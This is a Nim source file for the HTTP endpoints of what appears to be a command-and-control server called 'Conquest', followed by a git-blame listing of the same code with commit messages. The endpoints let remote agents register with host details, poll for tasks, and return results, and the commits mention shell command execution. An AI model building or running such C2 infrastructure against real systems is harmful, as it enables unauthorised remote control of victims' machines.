src/server/core/endpoints.nim

import prologue, nanoid, json
import sequtils, strutils, times

import ./agentApi
import ../../types

proc error404*(ctx: Context) {.async.} = 
    resp "", Http404

#[
    POST /{listener-uuid}/register
    Called from agent to register itself to the conquest server
]# 
proc register*(ctx: Context) {.async.} = 

    # Check headers
    # If POST data is not JSON data, return 404 error code
    if ctx.request.contentType != "application/json": 
        resp "", Http404
        return

    # The JSON data for the agent registration has to be in the following format
    #[
        {
            "username": "username",
            "hostname":"hostname",
            "domain": "domain.local",
            "ip": "ip-address",
            "os": "operating-system",
            "process": "agent.exe",
            "pid":  1234,
            "elevated": false.
            "sleep": 10
        }
    ]#  

    try: 
        let 
            postData: JsonNode = parseJson(ctx.request.body)
            agentRegistrationData: AgentRegistrationData = postData.to(AgentRegistrationData)
            agentUuid: string = generate(alphabet=join(toSeq('A'..'Z'), ""), size=8)
            listenerUuid: string = ctx.getPathParams("listener")
            date: DateTime = now()

        let agent: Agent = newAgent(agentUuid, listenerUuid, date, agentRegistrationData) 
        
        # Fully register agent and add it to database
        if not agent.register(): 
            # Either the listener the agent tries to connect to does not exist in the database, or the insertion of the agent failed
            # Return a 404 error code either way
            resp "", Http404
            return 

        # If registration is successful, the agent receives it's UUID, which is then used to poll for tasks and post results
        resp agent.name

    except CatchableError:
        # JSON data is invalid or does not match the expected format (described above)
        resp "", Http404

    return

#[
    GET /{listener-uuid}/{agent-uuid}/tasks
    Called from agent to check for new tasks
]#
proc getTasks*(ctx: Context) {.async.} = 
    
    let 
        listener = ctx.getPathParams("listener")
        agent = ctx.getPathParams("agent")
    
    let tasksJson = getTasks(listener, agent)
    
    # If agent/listener is invalid, return a 404 Not Found error code 
    if tasksJson == nil: 
        resp "", Http404

    # Return all currently active tasks as a JsonObject
    resp jsonResponse(tasksJson)


#[
    POST /{listener-uuid}/{agent-uuid}/{task-uuid}/results
    Called from agent to post results of a task

]#
proc postResults*(ctx: Context) {.async.} = 
    
    let 
        listener = ctx.getPathParams("listener")
        agent = ctx.getPathParams("agent")
        task = ctx.getPathParams("task")
    
    # Check headers
    # If POST data is not JSON data, return 404 error code
    if ctx.request.contentType != "application/json": 
        resp "", Http404
        return

    try: 
        let 
            taskResultJson: JsonNode = parseJson(ctx.request.body)
            taskResult: TaskResult = taskResultJson.to(TaskResult)
        
        # Handle and display task result
        handleResult(listener, agent, task, taskResult)

    except CatchableError:
        # JSON data is invalid or does not match the expected format (described above)
        resp "", Http404

    return
Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00			`import prologue, nanoid, json`
Implemented switch to agent interaction mode. 2025-05-18 12:51:26 +02:00			`import sequtils, strutils, times`
Implemented listener management (start, stop, list) and database integration. 2025-05-09 12:04:14 +02:00
Updated directory structure. 2025-07-15 23:26:54 +02:00			`import ./agentApi`
			`import ../../types`
Implemented agent registration, restructured Conquest type to utilize tables to store agents and listeners 2025-05-13 23:42:04 +02:00
			`proc error404*(ctx: Context) {.async.} =`
			`resp "", Http404`
Implemented listener management (start, stop, list) and database integration. 2025-05-09 12:04:14 +02:00
Started work on agent registration 2025-05-12 21:53:37 +02:00			`#[`
			`POST /{listener-uuid}/register`
			`Called from agent to register itself to the conquest server`
			`]#`
			`proc register*(ctx: Context) {.async.} =`

			`# Check headers`
Implemented agent registration, restructured Conquest type to utilize tables to store agents and listeners 2025-05-13 23:42:04 +02:00			`# If POST data is not JSON data, return 404 error code`
			`if ctx.request.contentType != "application/json":`
			`resp "", Http404`
			`return`
Started work on agent registration 2025-05-12 21:53:37 +02:00
Implemented agent registration, restructured Conquest type to utilize tables to store agents and listeners 2025-05-13 23:42:04 +02:00			`# The JSON data for the agent registration has to be in the following format`
Started work on agent registration 2025-05-12 21:53:37 +02:00			`#[`
			`{`
			`"username": "username",`
			`"hostname":"hostname",`
Implemented agent removal, changed object structures 2025-05-14 15:48:01 +02:00			`"domain": "domain.local",`
Started work on agent registration 2025-05-12 21:53:37 +02:00			`"ip": "ip-address",`
Implemented agent registration, restructured Conquest type to utilize tables to store agents and listeners 2025-05-13 23:42:04 +02:00			`"os": "operating-system",`
Implement listing agents; Add TODOs for further improvements 2025-05-14 12:42:23 +02:00			`"process": "agent.exe",`
Implemented agent registration, restructured Conquest type to utilize tables to store agents and listeners 2025-05-13 23:42:04 +02:00			`"pid": 1234,`
Prevent database locking by not updating latest checkin in database and instead storing it only in memory 2025-05-29 14:19:55 +02:00			`"elevated": false.`
			`"sleep": 10`
Started work on agent registration 2025-05-12 21:53:37 +02:00			`}`
			`]#`

Implemented agent registration, restructured Conquest type to utilize tables to store agents and listeners 2025-05-13 23:42:04 +02:00			`try:`
			`let`
			`postData: JsonNode = parseJson(ctx.request.body)`
Implement listing agents; Add TODOs for further improvements 2025-05-14 12:42:23 +02:00			`agentRegistrationData: AgentRegistrationData = postData.to(AgentRegistrationData)`
			`agentUuid: string = generate(alphabet=join(toSeq('A'..'Z'), ""), size=8)`
			`listenerUuid: string = ctx.getPathParams("listener")`
Implemented displaying latest checkin in agents table, as well as word-wrap. 2025-05-23 13:55:00 +02:00			`date: DateTime = now()`
Implemented agent registration, restructured Conquest type to utilize tables to store agents and listeners 2025-05-13 23:42:04 +02:00
Implement listing agents; Add TODOs for further improvements 2025-05-14 12:42:23 +02:00			`let agent: Agent = newAgent(agentUuid, listenerUuid, date, agentRegistrationData)`
Implemented agent registration, restructured Conquest type to utilize tables to store agents and listeners 2025-05-13 23:42:04 +02:00
			`# Fully register agent and add it to database`
			`if not agent.register():`
			`# Either the listener the agent tries to connect to does not exist in the database, or the insertion of the agent failed`
			`# Return a 404 error code either way`
			`resp "", Http404`
			`return`

			`# If registration is successful, the agent receives it's UUID, which is then used to poll for tasks and post results`
			`resp agent.name`
Started work on agent registration 2025-05-12 21:53:37 +02:00
Implemented agent registration, restructured Conquest type to utilize tables to store agents and listeners 2025-05-13 23:42:04 +02:00			`except CatchableError:`
			`# JSON data is invalid or does not match the expected format (described above)`
			`resp "", Http404`
Started work on agent registration 2025-05-12 21:53:37 +02:00
Implemented agent registration, restructured Conquest type to utilize tables to store agents and listeners 2025-05-13 23:42:04 +02:00			`return`
Implemented listener management (start, stop, list) and database integration. 2025-05-09 12:04:14 +02:00
Started work on agent registration 2025-05-12 21:53:37 +02:00			`#[`
			`GET /{listener-uuid}/{agent-uuid}/tasks`
			`Called from agent to check for new tasks`
			`]#`
			`proc getTasks*(ctx: Context) {.async.} =`
Implemented listener management (start, stop, list) and database integration. 2025-05-09 12:04:14 +02:00
Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00			`let`
			`listener = ctx.getPathParams("listener")`
			`agent = ctx.getPathParams("agent")`
Implemented listener management (start, stop, list) and database integration. 2025-05-09 12:04:14 +02:00
Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00			`let tasksJson = getTasks(listener, agent)`

			`# If agent/listener is invalid, return a 404 Not Found error code`
			`if tasksJson == nil:`
			`resp "", Http404`

			`# Return all currently active tasks as a JsonObject`
			`resp jsonResponse(tasksJson)`
Started work on agent registration 2025-05-12 21:53:37 +02:00

			`#[`
Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00			`POST /{listener-uuid}/{agent-uuid}/{task-uuid}/results`
Started work on agent registration 2025-05-12 21:53:37 +02:00			`Called from agent to post results of a task`

			`]#`
			`proc postResults*(ctx: Context) {.async.} =`

Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00			`let`
			`listener = ctx.getPathParams("listener")`
			`agent = ctx.getPathParams("agent")`
			`task = ctx.getPathParams("task")`
Started work on agent registration 2025-05-12 21:53:37 +02:00
Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00			`# Check headers`
			`# If POST data is not JSON data, return 404 error code`
			`if ctx.request.contentType != "application/json":`
			`resp "", Http404`
			`return`

			`try:`
			`let`
			`taskResultJson: JsonNode = parseJson(ctx.request.body)`
Seperated Task and TaskResult types. 2025-05-29 15:26:50 +02:00			`taskResult: TaskResult = taskResultJson.to(TaskResult)`
Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00
			`# Handle and display task result`
			`handleResult(listener, agent, task, taskResult)`

			`except CatchableError:`
			`# JSON data is invalid or does not match the expected format (described above)`
			`resp "", Http404`

			`return`